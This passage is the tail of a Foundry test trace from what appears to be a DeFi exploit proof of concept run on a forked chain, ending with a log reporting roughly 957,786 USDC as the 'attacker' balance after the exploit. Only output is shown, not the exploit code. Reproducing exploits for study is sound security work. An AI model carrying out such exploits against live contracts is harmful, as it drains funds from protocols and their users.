    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 6379138412000 [6.379e12], amount1In: 0, amount0Out: 6360000000000 [6.36e12], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 9: 0x0000000000000000000001182e2763868806718b48a42d1c27ebbca6f48c9e32 → 0x0000000000000000000001182e32c464ce66bd72a313b5173ddb39d5942281d8
    │   │   @ 8: 0x62235b1500000000083b4e4680109e6a279800000000000000005e0c50d08bb1 → 0x62235b9700000000083b4e4680109e6a279800000000000000005e10c58d8991
    │   │   @ 10: 0x0000000000000000000000000000000000001c7e86bc9a527ccb24ba4592c9e1 → 0x0000000000000000000000000000000000001c7e8c89dfcebec69aad1f255063
    │   └─ ← [Stop]
    ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [delegatecall]
    │   │   └─ ← [Return] 957786585605 [9.577e11]
    │   └─ ← [Return] 957786585605 [9.577e11]
    ├─ emit log_named_uint(key: "After exploit, USDC balance of attacker:", val: 957786585605 [9.577e11])
    ├─  storage changes:
    │   @ 12: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 13.66s (10.70s CPU time)

Ran 2 test suites in 13.70s (14.27s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
